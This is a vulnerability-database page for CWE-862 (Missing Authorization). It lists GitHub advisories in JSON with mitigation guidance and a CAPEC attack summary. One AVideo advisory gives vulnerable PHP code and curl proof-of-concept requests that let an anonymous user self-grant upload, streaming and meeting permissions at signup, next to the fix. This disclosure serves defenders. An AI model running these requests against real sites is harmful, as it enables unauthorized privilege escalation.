CWE-862
Allowed-with-ReviewMissing Authorization
Abstraction: Class · Status: Incomplete
The product does not perform an authorization check when an actor attempts to access a resource or perform an action.
14584 vulnerabilities reference this CWE, most recent first.
GHSA-8J4H-85HH-844W
Vulnerability from github – Published: 2024-10-30 00:31 – Updated: 2026-04-01 18:32Missing Authorization vulnerability in The SEO Guys at SEOPress SEOPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SEOPress: from n/a through 8.1.1.
{
"affected": [],
"aliases": [
"CVE-2024-50454"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-29T22:15:05Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in The SEO Guys at SEOPress SEOPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SEOPress: from n/a through 8.1.1.",
"id": "GHSA-8j4h-85hh-844w",
"modified": "2026-04-01T18:32:14Z",
"published": "2024-10-30T00:31:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50454"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Plugin/wp-seopress/vulnerability/wordpress-seopress-plugin-8-1-1-unauthenticated-broken-access-control-vulnerability?_s_id=cve"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/wp-seopress/wordpress-seopress-plugin-8-1-1-unauthenticated-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8J4J-75QJ-8C45
Vulnerability from github – Published: 2023-07-12 09:30 – Updated: 2024-04-04 06:02In messaging service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.
{
"affected": [],
"aliases": [
"CVE-2023-30923"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-07-12T09:15:11Z",
"severity": "MODERATE"
},
"details": "In messaging service, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed.",
"id": "GHSA-8j4j-75qj-8c45",
"modified": "2024-04-04T06:02:34Z",
"published": "2023-07-12T09:30:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30923"
},
{
"type": "WEB",
"url": "https://www.unisoc.com/en_us/secy/announcementDetail/1676902764208259073"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8J55-MH7V-FC8W
Vulnerability from github – Published: 2025-03-27 21:31 – Updated: 2025-03-27 21:31A Broken Object Level Authorization vulnerability in the component /households/permissions of hay-kot mealie v2.2.0 allows group managers to edit their own permissions.
{
"affected": [],
"aliases": [
"CVE-2024-55070"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-27T20:15:27Z",
"severity": "LOW"
},
"details": "A Broken Object Level Authorization vulnerability in the component /households/permissions of hay-kot mealie v2.2.0 allows group managers to edit their own permissions.",
"id": "GHSA-8j55-mh7v-fc8w",
"modified": "2025-03-27T21:31:22Z",
"published": "2025-03-27T21:31:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55070"
},
{
"type": "WEB",
"url": "https://github.com/mealie-recipes/mealie/issues/4593"
},
{
"type": "WEB",
"url": "https://m10x.de/posts/2025/03/all-your-recipe-are-belong-to-us-part-3/3-broken-access-controls-leading-to-privilege-escalation-and-more-in-mealie"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8J65-QV4G-W668
Vulnerability from github – Published: 2026-01-22 18:30 – Updated: 2026-01-27 00:31Missing Authorization vulnerability in cozythemes HomeLancer homelancer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HomeLancer: from n/a through <= 1.0.1.
{
"affected": [],
"aliases": [
"CVE-2025-49375"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-01-22T17:15:56Z",
"severity": "HIGH"
},
"details": "Missing Authorization vulnerability in cozythemes HomeLancer homelancer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects HomeLancer: from n/a through \u003c= 1.0.1.",
"id": "GHSA-8j65-qv4g-w668",
"modified": "2026-01-27T00:31:09Z",
"published": "2026-01-22T18:30:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49375"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Theme/homelancer/vulnerability/wordpress-homelancer-theme-1-0-1-broken-access-control-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8J8H-2HVP-G6JH
Vulnerability from github – Published: 2026-03-19 09:30 – Updated: 2026-04-01 18:36Missing Authorization vulnerability in Dotstore Fraud Prevention For Woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fraud Prevention For Woocommerce: from n/a through 2.3.3.
{
"affected": [],
"aliases": [
"CVE-2026-25443"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-19T09:16:17Z",
"severity": "HIGH"
},
"details": "Missing Authorization vulnerability in Dotstore Fraud Prevention For Woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Fraud Prevention For Woocommerce: from n/a through 2.3.3.",
"id": "GHSA-8j8h-2hvp-g6jh",
"modified": "2026-04-01T18:36:32Z",
"published": "2026-03-19T09:30:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25443"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/vulnerability/wordpress-fraud-prevention-for-woocommerce-plugin-2-3-2-arbitrary-content-deletion-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-8J8M-5HVP-9V7V
Vulnerability from github – Published: 2022-05-24 16:59 – Updated: 2024-04-04 02:33An issue was discovered on TerraMaster FS-210 4.0.19 devices. One can download backup files remotely from terramaster_TNAS-00E43A_config_backup.bin without permission.
{
"affected": [],
"aliases": [
"CVE-2019-18383"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-10-23T21:15:00Z",
"severity": "HIGH"
},
"details": "An issue was discovered on TerraMaster FS-210 4.0.19 devices. One can download backup files remotely from terramaster_TNAS-00E43A_config_backup.bin without permission.",
"id": "GHSA-8j8m-5hvp-9v7v",
"modified": "2024-04-04T02:33:46Z",
"published": "2022-05-24T16:59:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-18383"
},
{
"type": "WEB",
"url": "https://github.com/gusrmsdlrh/CVE-Reserved/blob/master/README.md"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-8J8M-P79X-G4JM
Vulnerability from github – Published: 2026-06-22 17:25 – Updated: 2026-06-22 17:25Summary
The set_api_signUp method in the API plugin accepts emailVerified, canUpload, canStream, and canCreateMeet parameters from user-supplied input and applies them to newly created accounts without verifying that the request was authenticated with a valid APISecret. Any anonymous user who can solve a CAPTCHA can self-grant elevated permissions during account registration.
Details
The authentication check in set_api_signUp (plugin/API/API.php:4222) allows either a valid APISecret (admin-level credential) or a solved CAPTCHA (anonymous access):
// plugin/API/API.php:4222-4232
if ($obj->APISecret !== @$_REQUEST['APISecret']) {
if(empty($_REQUEST['captcha'])){
return new ApiObject("Captcha is required");
}
require_once $global['systemRootPath'] . 'objects/captcha.php';
$valid = Captcha::validation($_REQUEST['captcha']);
if(!$valid){
return new ApiObject("Captcha is wrong, reload it and try again");
}
}
After this check, both code paths (APISecret and CAPTCHA) reach the privilege parameter handling unconditionally:
// plugin/API/API.php:4238-4249
if (isset($_REQUEST['emailVerified'])) {
$global['emailVerified'] = intval($_REQUEST['emailVerified']);
}
if (isset($_REQUEST['canCreateMeet'])) {
$global['canCreateMeet'] = intval($_REQUEST['canCreateMeet']);
}
if (isset($_REQUEST['canStream'])) {
$global['canStream'] = intval($_REQUEST['canStream']);
}
if (isset($_REQUEST['canUpload'])) {
$global['canUpload'] = intval($_REQUEST['canUpload']);
}
These $global values are then consumed by User::save() (objects/user.php:829-840), which overrides the user object's permission fields:
// objects/user.php:829-840
if (isset($global['emailVerified'])) {
$this->emailVerified = $global['emailVerified'];
}
if (isset($global['canCreateMeet'])) {
$this->canCreateMeet = $global['canCreateMeet'];
}
if (isset($global['canStream'])) {
$this->canStream = $global['canStream'];
}
if (isset($global['canUpload'])) {
$this->canUpload = $global['canUpload'];
}
Note that even though userCreate.json.php:90 sets canUpload from the site's default configuration, User::save() subsequently overrides it with the attacker-controlled $global value.
The codebase already uses self::isAPISecretValid() to guard admin-only operations in other API methods (e.g., lines 294, 991, 1664, 2150), but this check is missing for the privilege parameters in set_api_signUp.
PoC
# Step 1: Get a CAPTCHA token
# (Navigate to the signup page in a browser, solve the CAPTCHA, capture the token)
# Step 2: Register with elevated privileges
curl -X POST 'https://target/plugin/API/set.json.php' \
-d 'APIName=signUp' \
-d 'user=attacker' \
-d 'pass=Password123!' \
-d 'email=attacker@example.com' \
-d 'name=Attacker' \
-d 'captcha=VALID_CAPTCHA_TOKEN' \
-d 'emailVerified=1' \
-d 'canUpload=1' \
-d 'canStream=1' \
-d 'canCreateMeet=1'
# Expected: Account created with default (restricted) permissions
# Actual: Account created with upload, stream, and meet permissions enabled,
# plus email marked as verified
# Step 3: Verify elevated permissions by logging in and checking profile
curl -X POST 'https://target/plugin/API/set.json.php' \
-d 'APIName=signIn' \
-d 'user=attacker' \
-d 'pass=Password123!'
# Response will show canUpload=1, canStream=1, canCreateMeet=1, emailVerified=1
Impact
- Email verification bypass: Attackers can mark their accounts as email-verified without owning the email address, bypassing any email-gated functionality
- Unauthorized upload access: Self-granted upload permissions allow uploading potentially malicious video content to the platform
- Unauthorized streaming access: Self-granted streaming permissions allow unauthorized live streaming
- Unauthorized meeting creation: Self-granted meet permissions allow creating meetings on the platform
- Policy bypass: Platform administrators who intentionally restrict these permissions for new users (e.g., requiring manual approval before granting upload rights) have their access controls circumvented
Recommended Fix
Wrap the privilege parameter handling in an isAPISecretValid() check so that only admin-authenticated requests can set these values:
// plugin/API/API.php — replace lines 4238-4249 with:
if (self::isAPISecretValid()) {
if (isset($_REQUEST['emailVerified'])) {
$global['emailVerified'] = intval($_REQUEST['emailVerified']);
}
if (isset($_REQUEST['canCreateMeet'])) {
$global['canCreateMeet'] = intval($_REQUEST['canCreateMeet']);
}
if (isset($_REQUEST['canStream'])) {
$global['canStream'] = intval($_REQUEST['canStream']);
}
if (isset($_REQUEST['canUpload'])) {
$global['canUpload'] = intval($_REQUEST['canUpload']);
}
}
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "wwbn/avideo"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "29.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33684"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-22T17:25:03Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\nThe `set_api_signUp` method in the API plugin accepts `emailVerified`, `canUpload`, `canStream`, and `canCreateMeet` parameters from user-supplied input and applies them to newly created accounts without verifying that the request was authenticated with a valid APISecret. Any anonymous user who can solve a CAPTCHA can self-grant elevated permissions during account registration.\n\n## Details\n\nThe authentication check in `set_api_signUp` (`plugin/API/API.php:4222`) allows either a valid APISecret (admin-level credential) or a solved CAPTCHA (anonymous access):\n\n```php\n// plugin/API/API.php:4222-4232\nif ($obj-\u003eAPISecret !== @$_REQUEST[\u0027APISecret\u0027]) {\n if(empty($_REQUEST[\u0027captcha\u0027])){\n return new ApiObject(\"Captcha is required\");\n }\n require_once $global[\u0027systemRootPath\u0027] . \u0027objects/captcha.php\u0027;\n $valid = Captcha::validation($_REQUEST[\u0027captcha\u0027]);\n if(!$valid){\n return new ApiObject(\"Captcha is wrong, reload it and try again\");\n }\n}\n```\n\nAfter this check, both code paths (APISecret and CAPTCHA) reach the privilege parameter handling unconditionally:\n\n```php\n// plugin/API/API.php:4238-4249\nif (isset($_REQUEST[\u0027emailVerified\u0027])) {\n $global[\u0027emailVerified\u0027] = intval($_REQUEST[\u0027emailVerified\u0027]);\n}\nif (isset($_REQUEST[\u0027canCreateMeet\u0027])) {\n $global[\u0027canCreateMeet\u0027] = intval($_REQUEST[\u0027canCreateMeet\u0027]);\n}\nif (isset($_REQUEST[\u0027canStream\u0027])) {\n $global[\u0027canStream\u0027] = intval($_REQUEST[\u0027canStream\u0027]);\n}\nif (isset($_REQUEST[\u0027canUpload\u0027])) {\n $global[\u0027canUpload\u0027] = intval($_REQUEST[\u0027canUpload\u0027]);\n}\n```\n\nThese `$global` values are then consumed by `User::save()` (`objects/user.php:829-840`), which overrides the user object\u0027s permission fields:\n\n```php\n// objects/user.php:829-840\nif (isset($global[\u0027emailVerified\u0027])) {\n $this-\u003eemailVerified = $global[\u0027emailVerified\u0027];\n}\nif (isset($global[\u0027canCreateMeet\u0027])) {\n $this-\u003ecanCreateMeet = $global[\u0027canCreateMeet\u0027];\n}\nif (isset($global[\u0027canStream\u0027])) {\n $this-\u003ecanStream = $global[\u0027canStream\u0027];\n}\nif (isset($global[\u0027canUpload\u0027])) {\n $this-\u003ecanUpload = $global[\u0027canUpload\u0027];\n}\n```\n\nNote that even though `userCreate.json.php:90` sets `canUpload` from the site\u0027s default configuration, `User::save()` subsequently overrides it with the attacker-controlled `$global` value.\n\nThe codebase already uses `self::isAPISecretValid()` to guard admin-only operations in other API methods (e.g., lines 294, 991, 1664, 2150), but this check is missing for the privilege parameters in `set_api_signUp`.\n\n## PoC\n\n```bash\n# Step 1: Get a CAPTCHA token\n# (Navigate to the signup page in a browser, solve the CAPTCHA, capture the token)\n\n# Step 2: Register with elevated privileges\ncurl -X POST \u0027https://target/plugin/API/set.json.php\u0027 \\\n -d \u0027APIName=signUp\u0027 \\\n -d \u0027user=attacker\u0027 \\\n -d \u0027pass=Password123!\u0027 \\\n -d \u0027email=attacker@example.com\u0027 \\\n -d \u0027name=Attacker\u0027 \\\n -d \u0027captcha=VALID_CAPTCHA_TOKEN\u0027 \\\n -d \u0027emailVerified=1\u0027 \\\n -d \u0027canUpload=1\u0027 \\\n -d \u0027canStream=1\u0027 \\\n -d \u0027canCreateMeet=1\u0027\n\n# Expected: Account created with default (restricted) permissions\n# Actual: Account created with upload, stream, and meet permissions enabled,\n# plus email marked as verified\n\n# Step 3: Verify elevated permissions by logging in and checking profile\ncurl -X POST \u0027https://target/plugin/API/set.json.php\u0027 \\\n -d \u0027APIName=signIn\u0027 \\\n -d \u0027user=attacker\u0027 \\\n -d \u0027pass=Password123!\u0027\n# Response will show canUpload=1, canStream=1, canCreateMeet=1, emailVerified=1\n```\n\n## Impact\n\n- **Email verification bypass:** Attackers can mark their accounts as email-verified without owning the email address, bypassing any email-gated functionality\n- **Unauthorized upload access:** Self-granted upload permissions allow uploading potentially malicious video content to the platform\n- **Unauthorized streaming access:** Self-granted streaming permissions allow unauthorized live streaming\n- **Unauthorized meeting creation:** Self-granted meet permissions allow creating meetings on the platform\n- **Policy bypass:** Platform administrators who intentionally restrict these permissions for new users (e.g., requiring manual approval before granting upload rights) have their access controls circumvented\n\n## Recommended Fix\n\nWrap the privilege parameter handling in an `isAPISecretValid()` check so that only admin-authenticated requests can set these values:\n\n```php\n// plugin/API/API.php \u2014 replace lines 4238-4249 with:\nif (self::isAPISecretValid()) {\n if (isset($_REQUEST[\u0027emailVerified\u0027])) {\n $global[\u0027emailVerified\u0027] = intval($_REQUEST[\u0027emailVerified\u0027]);\n }\n if (isset($_REQUEST[\u0027canCreateMeet\u0027])) {\n $global[\u0027canCreateMeet\u0027] = intval($_REQUEST[\u0027canCreateMeet\u0027]);\n }\n if (isset($_REQUEST[\u0027canStream\u0027])) {\n $global[\u0027canStream\u0027] = intval($_REQUEST[\u0027canStream\u0027]);\n }\n if (isset($_REQUEST[\u0027canUpload\u0027])) {\n $global[\u0027canUpload\u0027] = intval($_REQUEST[\u0027canUpload\u0027]);\n }\n}\n```",
"id": "GHSA-8j8m-p79x-g4jm",
"modified": "2026-06-22T17:25:03Z",
"published": "2026-06-22T17:25:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8j8m-p79x-g4jm"
},
{
"type": "WEB",
"url": "https://github.com/WWBN/AVideo/commit/061f242cba0e068cc1b461705fe839274b5038ff"
},
{
"type": "PACKAGE",
"url": "https://github.com/WWBN/AVideo"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "AVideo\u0027s Privilege Escalation via Unguarded Permission Parameters in signUp API Allows Self-Granting Upload/Stream/Meet Permissions"
}
GHSA-8J9W-R385-57X8
Vulnerability from github – Published: 2023-07-18 03:30 – Updated: 2024-04-04 06:12The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'pm_upload_csv' function in versions up to, and including, 5.5.1. This makes it possible for authenticated attackers, with subscriber-level permissions or above to import new users and update existing users.
{
"affected": [],
"aliases": [
"CVE-2023-3403"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-07-18T03:15:55Z",
"severity": "MODERATE"
},
"details": "The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the \u0027pm_upload_csv\u0027 function in versions up to, and including, 5.5.1. This makes it possible for authenticated attackers, with subscriber-level permissions or above to import new users and update existing users.",
"id": "GHSA-8j9w-r385-57x8",
"modified": "2024-04-04T06:12:25Z",
"published": "2023-07-18T03:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3403"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/browser/profilegrid-user-profiles-groups-and-communities/tags/5.4.8/admin/class-profile-magic-admin.php#L1027"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/2938904/profilegrid-user-profiles-groups-and-communities#file0"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b335fc19-2998-4711-8813-6cb68d7447bd?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-8JC6-XGRG-9FP3
Vulnerability from github – Published: 2024-12-09 15:31 – Updated: 2026-04-28 21:35Missing Authorization vulnerability in Noah Hearle, Design Extreme Reviews and Rating – Google My Business allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Reviews and Rating – Google My Business: from n/a through 4.14.
{
"affected": [],
"aliases": [
"CVE-2023-23986"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-09T13:15:22Z",
"severity": "MODERATE"
},
"details": "Missing Authorization vulnerability in Noah Hearle, Design Extreme Reviews and Rating \u2013 Google My Business allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Reviews and Rating \u2013 Google My Business: from n/a through 4.14.",
"id": "GHSA-8jc6-xgrg-9fp3",
"modified": "2026-04-28T21:35:16Z",
"published": "2024-12-09T15:31:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-23986"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/plugin/g-business-reviews-rating/vulnerability/wordpress-reviews-and-rating-google-my-business-plugin-4-14-broken-access-control?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-8JC8-VXW9-8XXP
Vulnerability from github – Published: 2025-01-28 21:31 – Updated: 2025-01-28 21:31In shouldSkipForInitialSUW of AdvancedPowerUsageDetail.java, there is a possible way to bypass factory reset protections due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.
{
"affected": [],
"aliases": [
"CVE-2024-40677"
],
"database_specific": {
"cwe_ids": [
"CWE-862"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-28T20:15:49Z",
"severity": "HIGH"
},
"details": "In shouldSkipForInitialSUW of AdvancedPowerUsageDetail.java, there is a possible way to bypass factory reset protections due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.",
"id": "GHSA-8jc8-vxw9-8xxp",
"modified": "2025-01-28T21:31:04Z",
"published": "2025-01-28T21:31:04Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40677"
},
{
"type": "WEB",
"url": "https://android.googlesource.com/platform/packages/apps/Settings/+/db26138f07db830e3fb78283d37de3c0296d93cb"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/2024-10-01"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
- Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
- Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].
Mitigation MIT-4.4
Strategy: Libraries or Frameworks
- Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
- For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
- For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
- One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.
CAPEC-665: Exploitation of Thunderbolt Protection Flaws
An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.